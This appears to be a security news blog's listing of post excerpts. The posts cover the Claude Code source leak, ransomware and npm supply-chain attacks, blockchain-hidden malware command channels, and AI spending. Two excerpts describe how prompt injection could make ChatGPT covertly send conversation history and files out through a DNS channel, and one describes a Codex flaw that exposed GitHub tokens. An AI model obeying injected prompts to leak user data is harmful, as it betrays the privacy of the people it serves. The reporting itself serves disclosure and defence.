Posts

Claude Code Source Leak: How a Simple npm Mistake Exposed Anthropic’s Internal AI Engine

Image
A recent incident involving Anthropic has drawn significant attention across the cybersecurity and AI communities after internal source code for its AI coding assistant, Claude Code, was unintentionally exposed online. What Happened? Anthropic confirmed that a release of Claude Code (version 2.1.88) accidentally included a source map file within its npm package. This file, typically used for debugging, allowed anyone to reconstruct the original TypeScript source code—effectively exposing the internal workings of the application. The leak consisted of roughly 500,000 lines of code spread across nearly 2,000 files, giving a detailed look into the architecture, tools, and orchestration logic behind the AI-powered coding assistant. Anthropic clarified that the incident was caused by a packaging error and human oversight, not an external breach or cyberattack. Importantly, no customer data or credentials were compromised. What the Leak Revealed The exposed codebase provided deep insig...

Bearlyfy Hits Russian Firms with Custom GenieLocker Ransomware

Image
  A pro-Ukrainian group called  Bearlyfy  has been attributed to more than 70 cyber attacks targeting Russian companies since it first surfaced in the threat landscape in January 2025, with recent attacks leveraging a custom Windows ransomware strain codenamed GenieLocker.  Bearlyfy (also known as Labubu) operates as a dual-purpose group aimed at inflicting maximum damage upon Russian businesses; its attacks serve the dual objectives of extortion for financial gain and acts of sabotage. The hacking group was   first documented   by F6 in September 2025 as leveraging encryptors associated with LockBit 3 (Black) and Babuk, with early intrusions focusing on smaller companies before upping the ante and demanding ransoms to the tune of €80,000 (about $92,100). By August 2025, the group had claimed at least 30 victims. Beginning May 2025, Bearlyfy actors also utilized a modified version of  PolyVice , a ransomware family attributed to   Vice Society ...

Critical AI Vulnerability: OpenAI Patches ChatGPT Data Exfiltration Flaw

Image
Security researchers have identified a serious vulnerability in ChatGPT that allowed sensitive user data to be exfiltrated without the user’s knowledge. The issue has now been patched by OpenAI , but it raises major concerns about data security in AI-driven environments. The flaw was discovered by security researchers and demonstrated how a single malicious prompt could turn a normal interaction into a covert data exfiltration channel. How the Attack Worked The vulnerability relied on prompt injection techniques, where attackers could manipulate the AI’s behavior through carefully crafted inputs. In this case, malicious prompts could force ChatGPT to leak: Conversation history Uploaded files Sensitive contextual data What makes this particularly dangerous is that the attack could occur silently, without any visible indication to the user. Codex Vulnerability Expands the Risk Alongside the ChatGPT issue, researchers also identified a separate vulnerability affecting Open...

Big Tech AI Spending and the Energy Cost Risk

Image
  This report summarizes Reuters reporting from March 31, 2026, on the scale of planned AI infrastructure spending by major technology firms and the risks posed by rising energy costs. Reuters reported that, before the Iran war, Microsoft, Amazon, Alphabet, and Meta were expected to spend about $635 billion in 2026 on data centers, chips, and other AI infrastructure. That figure was described as an increase from $383 billion the previous year and $80 billion in 2019. Objective The objective of this report is to explain how energy market volatility could affect AI investment plans, corporate earnings, and broader equity markets. The article frames the issue not as a technology slowdown by default, but as a stress test for whether current AI spending plans remain sustainable if energy costs rise further. Summary of Findings Reuters cited Melissa Otto, head of research at S&P Global Visible Alpha, who said that persistently high oil prices could force revisions to capital spending...

OpenAI Patch for ChatGPT Data Exfiltration and Codex Token Vulnerability

Image
  Overview This report summarizes two security issues involving OpenAI products that were publicly described on March 30, 2026. The first issue concerned a previously unknown flaw in ChatGPT that researchers said could allow sensitive conversation content, including uploaded files and user messages, to be exfiltrated through a covert DNS-based channel originating from the Linux runtime used for code execution and data analysis. The second issue concerned a command injection vulnerability in OpenAI Codex that researchers said could expose GitHub tokens and enable unauthorized access to code repositories. According to the reporting, OpenAI patched the ChatGPT issue on February 20, 2026, and patched the Codex issue on February 5, 2026. The article also states there was no evidence the ChatGPT flaw had been maliciously exploited. Objective The objective of this report is to document the nature of the vulnerabilities, describe their potential impact on users and organizations, and hig...

Critical Supply Chain Attack: Axios npm Package Compromised to Deliver Cross-Platform RAT

Image
A major supply chain attack has impacted the widely used JavaScript library Axios , after attackers managed to publish malicious versions of the package to npm using compromised maintainer credentials. The incident affects versions 1.14.1 and 0.30.4 , which were found to include a hidden malicious dependency designed to deliver malware across multiple operating systems. How the Attack Was Executed The attackers gained access to the npm account of a core Axios maintainer, allowing them to push tampered versions of the package without raising immediate suspicion. These malicious releases introduced a fake dependency named “plain-crypto-js” , which served as the initial infection vector. Because the packages were published through legitimate channels, they bypassed standard CI/CD security checks, making the attack particularly dangerous. Malware Delivery via Post-Install Script The injected dependency was not just harmless code, it contained a post-install script that executed au...

Advanced Malware Threat: GlassWorm Uses Solana Blockchain to Evade Detection

Image
Security researchers have uncovered a new evolution of the GlassWorm malware campaign, introducing a highly sophisticated technique that leverages blockchain technology to hide its command-and-control (C2) infrastructure. Unlike traditional malware, this variant uses the Solana blockchain as a “dead drop” mechanism to retrieve instructions and payloads, making detection and takedown significantly more difficult. How the Attack Works The attack chain is multi-stage and designed for maximum stealth and data exfiltration. Initial access is typically gained through compromised developer ecosystems, including malicious packages distributed via platforms like npm, PyPI, GitHub, and extension marketplaces. Once executed, the malware retrieves instructions from data embedded in Solana blockchain transactions, effectively hiding its infrastructure in a decentralized and immutable environment. From there, it downloads system-specific payloads and begins the infection process. Multi-Stage...